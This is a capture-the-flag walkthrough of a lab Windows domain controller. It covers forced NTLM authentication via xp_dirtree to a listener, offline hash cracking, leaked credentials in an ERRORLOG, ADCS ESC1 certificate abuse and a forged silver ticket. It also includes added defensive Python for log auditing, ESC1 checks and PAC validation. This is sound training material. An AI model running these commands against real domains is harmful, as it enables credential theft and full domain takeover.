System: Windows
Topics: ADCS attack, silver ticket
Port scan. Add sequel.htb and dc.sequel.htb to the hosts file.
~/D/e $auto_nmap.sh $IP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-21 08:08:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-21T08:10:09+00:00; +7h44m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
|_SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-21T08:10:08+00:00; +7h44m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
|_SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-21T08:10:09+00:00; +7h44m05s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-21T07:51:15
| Not valid after: 2055-01-21T07:51:15
| MD5: 6517:36fa:5f97:b105:f9c4:d9bc:ca85:39ae
|_SHA-1: c9d8:f6e3:9a9d:59c3:e010:89f4:5c55:a74c:7249:f6d1
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-21T08:10:09+00:00; +7h44m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
|_SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
|_SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
|_ssl-date: 2025-01-21T08:10:08+00:00; +7h44m04s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49728/tcp open msrpc Microsoft Windows RPC
49750/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
There are no account hints so far, so only a null session can be used for some basic information gathering. Start with SMB: the Public share is readable.
~/D/e $crackmapexec smb $IP -u 'null' -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\null:
SMB 10.10.11.202 445 DC [+] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share
Download the PDF file and take a look at it.
~/D/e $smbclient //$IP/Public -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 12:51:25 2022
.. D 0 Sat Nov 19 12:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 14:39:43 2022
5184255 blocks of size 4096. 1475340 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? yes
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (41.4 KiloBytes/sec) (average 41.4 KiloBytes/sec)
Reading the PDF reveals two usernames, ryan and brandon, and a default SQL Server login, PublicUser:GuestUserCantWrite1.
RID brute-forcing can be used first to obtain some usernames.
~/D/e $netexec smb $IP -u 'anonymous' -p '' --rid-brute 10000 |grep SidTypeUser |awk '{print $6}' |cut -d '\' -f2 | tee names.txt
Administrator
Guest
krbtgt
DC$
Tom.Henn
Brandon.Brown
Ryan.Cooper
sql_svc
James.Roberts
Nicole.Thompson
The default account from the PDF can log in to SQL Server, but looking at the databases, there is nothing special.
~/D/e $mssqlclient.py PublicUser:GuestUserCantWrite1@$IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)> select name from sys.databases
name
------
master
tempdb
model
msdb
After some trying, the PublicUser account has no permission to run xp_cmdshell, but it can run xp_dirtree against a remote host, which forces the server to authenticate to it.
SQL (PublicUser guest@master)> EXEC MASTER.sys.xp_dirtree '\\10.10.16.11\kali', 1, 1
subdirectory depth file
------------ ----- ----
Responder on our machine captures sql_svc's NTLMv2 hash.
~/D/e $sudo responder -I tun0 -Pdv
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:70c5cd1859199a...
Cracking it offline yields sql_svc's password.
~/D/e $john --wordlist=/usr/share/wordlists/rockyou.txt sql_svc.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:03 DONE (2025-01-21 02:52) 0.3076g/s 3292Kp/s 3292Kc/s 3292KC/s RENZOJAVIER..REDMAN69
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Verify what the account can do: it can log in over SMB and LDAP.
~/D/e $check_auth.sh $IP -u sql_svc -p REGGIE1234ronnie
Running: netexec smb 10.10.11.202 -u null -p null
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\null:null (Guest)
----------------------------------------
Running: netexec winrm 10.10.11.202 -u null -p null
WINRM 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM 10.10.11.202 5985 DC [-] sequel.htb\null:null
----------------------------------------
Running: netexec ldap 10.10.11.202 -u null -p null
/opt/check_auth.sh: line 57: warning: command substitution: ignored null byte in input
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.202 636 DC [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAPS 10.10.11.202 636 DC [+] sequel.htb\null:null
Collect BloodHound data.
~/D/e $netexec ldap $IP -u sql_svc -p 'REGGIE1234ronnie' --bloodhound --collection All --dns-server $IP
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.202 636 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie
LDAPS 10.10.11.202 636 DC Resolved collection methods: container, trusts, acl, group, psremote, rdp, objectprops, session, dcom, localadmin
LDAP 10.10.11.202 389 DC Done in 00M 20S
LDAPS 10.10.11.202 636 DC Compressing output into /home/kali/.nxc/logs/DC_10.10.11.202_2025-01-21_025545_bloodhound.zip
sql_svc is a member of the Remote Management Users group, so it can log in to a shell.
~/D/e $bloodyAD --host dc.sequel.htb -d sequel.htb -u sql_svc -p REGGIE1234ronnie get object sql_svc --attr memberOf
distinguishedName: CN=sql_svc,CN=Users,DC=sequel,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=sequel,DC=htb
Log in to the target with evil-winrm and look at the user directories; it looks like the next step is to obtain the user ryan.
~/D/e $evil-winrm -i $IP -u sql_svc -p REGGIE1234ronnie
...
*Evil-WinRM* PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
In the SQLServer folder there is an ERRORLOG backup file that contains the ryan username and a suspicious string.
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
...
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...
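As an added example (not part of the original writeup), a small detector for the pattern just shown: a failed SQL Server logon for a real account immediately followed, from the same client, by a failed logon whose "user" looks like a password typed into the wrong field. The ERRORLOG excerpt and the KNOWN_SQL_LOGINS allow-list are constructed for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt modelled on the entries quoted above.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:05.10 Logon       Login succeeded for user 'sequel.htb\\sql_svc'. Connection made using Windows authentication. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:44:01.02 Logon       Logon failed for user 'PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.16.11]
"""

LOGON_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)
KNOWN_SQL_LOGINS = {"sa", "publicuser"}  # constructed allow-list of SQL logins

def looks_like_password(name):
    """Not DOMAIN\\user or UPN form, not a known SQL login, and has the
    mixed-case-plus-digit shape of a password typed into the username field."""
    if "\\" in name or "@" in name or name.lower() in KNOWN_SQL_LOGINS:
        return False
    return (any(c.isdigit() for c in name) and any(c.isupper() for c in name)
            and any(c.islower() for c in name))

def find_leaked_credentials(log_text, window_seconds=5):
    """Return (account, leaked_string) pairs: a failed logon for a real account
    followed within window_seconds, from the same client, by a failed logon
    whose 'user' looks like a password."""
    events = []
    for line in log_text.splitlines():
        m = LOGON_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    hits = []
    for i, (ts, user, client) in enumerate(events):
        if not looks_like_password(user):
            continue
        # Walk back through earlier failures from the same client inside the window
        for prev_ts, prev_user, prev_client in reversed(events[:i]):
            if ts - prev_ts > timedelta(seconds=window_seconds):
                break
            if prev_client == client and not looks_like_password(prev_user):
                hits.append((prev_user, user))
                break
    return hits

if __name__ == "__main__":
    for account, leaked in find_leaked_credentials(SAMPLE_ERRORLOG):
        print(f"possible password for {account} left in ERRORLOG: {leaked!r}")
```

Any hit is a reason to rotate that account's password and to review who can read the SQL Server log directory and its backups.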
Check whether this suspicious string is a password.
~/D/e $netexec smb $IP -u names.txt -p 'NuclearMosquito3'
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [-] sequel.htb\Administrator:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\Guest:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\krbtgt:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\DC$:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\Tom.Henn:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\Brandon.Brown:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
Log in to a shell as ryan.
~/D/e $evil-winrm -i $IP -u ryan.cooper -p 'NuclearMosquito3'
...
After browsing around in the shell there is nothing exploitable, and BloodHound shows no usable path either. Next, check whether the ADCS service has any vulnerable templates.
~/D/e $certipy find -scheme ldap -u ryan.cooper@sequel.htb -p NuclearMosquito3 -debug -target dc.sequel.htb -dc-ip $IP -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc.sequel.htb' at '10.10.11.202'
[+] Authenticating to LDAP server
[!] LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.202:636 - ssl
[+] Default path: DC=sequel,DC=htb
[+] Configuration path: CN=Configuration,DC=sequel,DC=htb
[+] Adding Domain Computers to list of current user's SIDs
[+] List of current user's SIDs:
SEQUEL.HTB\Authenticated Users (SEQUEL.HTB-S-1-5-11)
SEQUEL.HTB\Access Control Assistance Operators (SEQUEL.HTB-S-1-5-32-580)
SEQUEL.HTB\Users (SEQUEL.HTB-S-1-5-32-545)
SEQUEL.HTB\Ryan.Cooper (S-1-5-21-4078382237-1492182817-2568127209-1105)
SEQUEL.HTB\Domain Users (S-1-5-21-4078382237-1492182817-2568127209-513)
SEQUEL.HTB\Everyone (SEQUEL.HTB-S-1-1-0)
SEQUEL.HTB\Domain Computers (S-1-5-21-4078382237-1492182817-2568127209-515)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Resolved 'dc.sequel.htb' from cache: 10.10.11.202
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.11.202
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sequel.htb' (10.10.11.202)
[*] Got CA configuration for 'sequel-DC-CA'
[+] Resolved 'dc.sequel.htb' from cache: 10.10.11.202
[+] Connecting to 10.10.11.202:80
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
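As an added audit helper (not Certipy's code and not from the original writeup), the ESC1 conditions Certipy reports above written out as an explicit check, run over a record modelled on the UserAuthentication template and sequel-DC-CA and over a hardened copy of the template. The field names and the LOW_PRIV_PRINCIPALS set are this example's own assumptions.

```python
# Constructed records shaped after the Certipy "find" output quoted above;
# the field names are this example's own, not Certipy's data model.
LOW_PRIV_PRINCIPALS = {
    "SEQUEL.HTB\\Domain Users", "SEQUEL.HTB\\Domain Computers",
    "SEQUEL.HTB\\Authenticated Users", "SEQUEL.HTB\\Users", "SEQUEL.HTB\\Everyone",
}
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}

USER_AUTHENTICATION = {
    "name": "UserAuthentication",
    "enabled": True,
    "enrollee_supplies_subject": True,
    "eku": ["Client Authentication", "Secure Email", "Encrypting File System"],
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "enrollment_rights": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users",
                          "SEQUEL.HTB\\Enterprise Admins"],
}
SEQUEL_DC_CA = {
    "name": "sequel-DC-CA",
    "request_disposition": "Issue",
    "enroll": ["SEQUEL.HTB\\Authenticated Users"],
}
# One common remediation: stop enrollees choosing the subject and gate issuance.
HARDENED = dict(USER_AUTHENTICATION, name="UserAuthentication (hardened)",
                enrollee_supplies_subject=False, requires_manager_approval=True)

def audit_esc1(template, ca):
    """Return (vulnerable, blocking_checks). Every check must hold for ESC1;
    blocking_checks lists the ones that do not, so it is empty when vulnerable."""
    eku = set(template["eku"])
    checks = {
        "template enabled": template["enabled"],
        "enrollee supplies subject": template["enrollee_supplies_subject"],
        # An empty EKU list is treated as permitting any purpose
        "EKU permits client authentication": bool(eku & AUTH_EKUS) or not eku,
        "no manager approval": not template["requires_manager_approval"],
        "no authorized signatures required": template["authorized_signatures_required"] == 0,
        "low-privileged principal can enroll on template":
            bool(set(template["enrollment_rights"]) & LOW_PRIV_PRINCIPALS),
        "low-privileged principal can enroll at CA":
            bool(set(ca["enroll"]) & LOW_PRIV_PRINCIPALS),
        "CA issues requests without review": ca["request_disposition"] == "Issue",
    }
    blocking = [name for name, ok in checks.items() if not ok]
    return (not blocking, blocking)

if __name__ == "__main__":
    for tpl in (USER_AUTHENTICATION, HARDENED):
        print(tpl["name"], audit_esc1(tpl, SEQUEL_DC_CA))
```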
The output shows that the UserAuthentication template is exploitable via ESC1. As ryan, request a certificate for administrator and save it as a PFX file. If you hit a NETBIOS timeout, just run the command a few more times.
~/D/e $certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
~/D/e $certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
First sync the clock with the server.
~/D/e $sudo ntpdate -u $IP
2025-01-21 11:27:55.456950 (+0100) +27844.017766 +/- 0.049238 10.10.11.202 s1 no-leap
CLOCK: time stepped by 27844.017766
When using the PFX file to request a TGT, the command keeps failing.
~/D/e $certipy auth -pfx ./administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
In the end, a silver ticket was used instead.
In the TGS-REP stage of Kerberos authentication, after verifying the authenticity of the TGT sent by the client and the security of the session, the KDC's ticket-granting service returns the ST (service ticket) for the requested service. The encrypted part of the ST, authorization-data, is encrypted with the service key, and authorization-data holds the PAC that represents the user's identity. In this stage the PAC's PAC_SERVER_CHECKSUM signature is also keyed with the service key (the PAC's PAC_PRIVSVR_CHECKSUM signature is keyed with the krbtgt key, so the client cannot forge PAC_PRIVSVR_CHECKSUM). However, because verification of the PAC_PRIVSVR_CHECKSUM signature is optional and disabled by default, an attacker who cannot forge PAC_PRIVSVR_CHECKSUM can still use that ST to make ordinary requests with high privileges.
Therefore, as long as a security researcher holds the key of the target service, they can forge a high-privilege PAC, wrap it in an ST, sign it with PAC_SERVER_CHECKSUM and encrypt it. The client then uses this ST to access the target service with high privileges. This attack is known as a silver ticket (pass-the-ticket) attack.
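As an added illustration of the argument above (not from the writeup and not real Kerberos code), a simplified model of the two PAC signatures: HMAC-SHA256 stands in for the Kerberos checksum, and the keys and PAC body are constructed. It shows that a PAC signed with only the service key passes a service that skips PAC validation, but fails as soon as the PAC_PRIVSVR_CHECKSUM is checked.

```python
import hashlib
import hmac
import os

# Constructed keys and PAC body for the model; nothing here is real key material.
SERVICE_KEY = b"constructed sql_svc service key"
KRBTGT_KEY = b"constructed krbtgt key"
PAC_BODY = b"user=Administrator;groups=512,519"

def checksum(key, data):
    """HMAC-SHA256 stands in for the Kerberos checksum over the PAC."""
    return hmac.new(key, data, hashlib.sha256).digest()

def kdc_issued_pac(body, service_key, krbtgt_key):
    """Legitimate TGS path: PAC_SERVER_CHECKSUM keyed with the service key,
    PAC_PRIVSVR_CHECKSUM keyed with the krbtgt key over the server checksum."""
    server_sig = checksum(service_key, body)
    return {"body": body, "server_sig": server_sig,
            "kdc_sig": checksum(krbtgt_key, server_sig)}

def silver_ticket_pac(body, service_key):
    """What arrives in a silver ticket: a correct server checksum (the service
    key is known) but a PAC_PRIVSVR_CHECKSUM that cannot be computed without
    the krbtgt key, so it is just filler bytes."""
    server_sig = checksum(service_key, body)
    return {"body": body, "server_sig": server_sig, "kdc_sig": os.urandom(32)}

def service_accepts(pac, service_key, krbtgt_key=None):
    """Service-side decision. With krbtgt_key=None only the server checksum is
    verified (no PAC validation, the default the text describes). Passing
    krbtgt_key models the service having the DC validate PAC_PRIVSVR_CHECKSUM."""
    if not hmac.compare_digest(pac["server_sig"], checksum(service_key, pac["body"])):
        return False
    if krbtgt_key is None:
        return True
    return hmac.compare_digest(pac["kdc_sig"], checksum(krbtgt_key, pac["server_sig"]))

if __name__ == "__main__":
    legit = kdc_issued_pac(PAC_BODY, SERVICE_KEY, KRBTGT_KEY)
    forged = silver_ticket_pac(PAC_BODY, SERVICE_KEY)
    print("legit, no validation:  ", service_accepts(legit, SERVICE_KEY))
    print("forged, no validation: ", service_accepts(forged, SERVICE_KEY))
    print("forged, PAC validation:", service_accepts(forged, SERVICE_KEY, KRBTGT_KEY))
```

The same model shows why the service account's key matters so much: a strong, regularly rotated password for sql_svc is what makes the server checksum unforgeable in the first place.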
To create a silver ticket we need the following:
❑ the target service's key;
❑ the domain SID;
❑ the domain name;
❑ the domain user to impersonate, usually a high-privilege account such as a domain admin.
The target runs a SQL service under the sql_svc account, whose plaintext password we have.
Convert sql_svc's password to an NT hash; many tools can do this, for example CyberChef.
BloodHound shows that the domain SID is S-1-5-21-4078382237-1492182817-2568127209.
Run the following command to create the ticket.
~/D/e $impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -dc-ip dc.sequel.htb -spn nonexistent/DC.SEQUEL.HTB Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
With this ticket we can log in to SQL Server as administrator.
~/D/e $KRB5CCNAME=administrator.ccache mssqlclient.py -k dc.sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sequel\Administrator dbo@master)>
The following query reads the root flag. The one drawback is that this does not give us an administrator shell.
SQL (sequel\Administrator dbo@master)> SELECT * FROM OPENROWSET(BULK N'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) AS Contents
BulkColumn